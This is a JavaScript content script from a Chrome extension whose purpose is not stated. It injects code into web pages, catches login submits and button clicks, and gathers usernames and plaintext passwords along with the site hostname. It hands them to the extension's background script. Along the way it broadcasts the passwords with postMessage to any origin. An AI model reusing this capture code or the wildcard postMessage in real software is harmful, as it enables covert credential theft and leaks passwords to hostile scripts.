/**
 * @author: Nikolai Vorkinn
 */

/**
 * Gets the password
 */
function getPassword() {
    var password = undefined;
    // Look for non-empty password field and get its index of all input fields.
    $("input:password").filter(function () {
        return $(this).val();
    }).each(function () {
        password = $(this).val();
        return false;
    });
    return password;
}

/**
 * Gets the username
 */
function getUsername() {
    var username = 'unknown';
    // Get the username
    $("input:text, input[type=email]").filter(function () {
        return $(this).val();
    }).each(function () {

        var title = $(this).attr('title');
        var name = $(this).attr('name');
        var classes = $(this).attr('class');
        var id = $(this).attr('id');
        var label = $("label[for='" + id + "']");

        if ((title && title.match(/username|userid|email|login/i))
            || (name && name.match(/username|userid|email|login/i))
            || (classes && classes.match(/username|userid|email|login/i))
            || (id && (id.match(/username|userid|email|login/i)) || (label.length && label.val().match(/username|userid|email|login/i)))
            || ($(this).val().match(/@/))) {

            username = $(this).val();
            return false;
        }
    });
    return username;
}

/**
 * Inject small script into page to detect submit events
 * @type {HTMLElement}
 */
var script = document.createElement('script');
script.textContent = '(' + function () {

    var submitted = false;

    function submit(ev) {
        var password, username, regex = /user|username|email|userid/i;
        if (ev['srcElement']) {
            for (var i = 0; i < ev['srcElement'].length; i++) {
                var element = ev['srcElement'][i];
                if (element['tagName'].match(/input/i)) {
                    var placeholder = element['placeholder'];
                    var title = element['title'];
                    var name = element['name'];
                    var className = element['className'];
                    var id = element['id'];
                    if (element['type'] === 'password') {
                        password = element['value'];
                    }
                    else if ((placeholder && placeholder.match(regex))
                        || (className && className.match(regex))
                        || (id && id.match(regex))
                        || (name && name.match(regex))
                        || (title && title.match(regex))
                        || element['value'].match(/@/)) {
                        username = element['value'];
                    }
                }
            }
        }
        if (!submitted) {
            submitted = true;
            window.postMessage({
                type: "NEW_PASSWORD",
                password: password,
                username: username
            }, "*");
        }
    }

    document.body.addEventListener('submit', submit, false);

    var btnSel = [
        "button:not([type='submit'])",
        "input[type='button']",
        ".button:not([type='submit'])",
        "[role='button']:not([type='submit'])"
    ].join(",");
    [].forEach.call(document.querySelectorAll(btnSel), function (button) {
        if (button['innerText'] && button['innerText'].match(/sign in|signin|login|log in|logg inn/i)) {
            button.addEventListener('click', submit, false);
        }
    });

    var imgBtnSel = [
        "input[type='image'][id*='btn']",
        "input[type='image'][name*='btn']"
    ].join(",");
    [].forEach.call(document.querySelectorAll(imgBtnSel), function (imgButton) {
        imgButton.addEventListener('click', submit, false);
    });


    var mutationObserver = new MutationObserver(function (mutations) {
        submitted = false;
        [].forEach.call(mutations[0]['target'].querySelectorAll("iframe"), function (iframe) {
            try {
                if (iframe.contentDocument) {
                    iframe.contentDocument.addEventListener('submit', submit, false);
                }
            }
            catch (err) {
                console.error(err);
            }
        });
    });
    mutationObserver.observe(document, {subtree: true, attributes: true});
} + ')();';

script.onload = function () {
    this.parentNode.removeChild(this);
};
(document.head || document.documentElement).appendChild(script);

/**
 * Record how long a user is on a page
 */
var startTime = new Date().getTime();

function login(password, username) {
    var endTime = new Date().getTime();
    var timeSpent = endTime - startTime;
    if (password === undefined) {
        password = getPassword();
    }
    if (password !== undefined) {
        if (username === undefined) {
            username = getUsername();
            }
        // Then send the passwords over to the background script
        chrome.runtime.sendMessage({
            'type': 'newPassword',
            'username': username,
            'password': password,
            'url': window.location.hostname,
            'time': new Date().getTime(),
            'timeSpent': timeSpent
        });
    }
}

/**
 * Listen to 'submit' events in forms.
 */
window.addEventListener('message', function (message) {
    if (message['data']['type'] === "NEW_PASSWORD") {
        login(message['data']['password'], message['data']['username']);
    }
});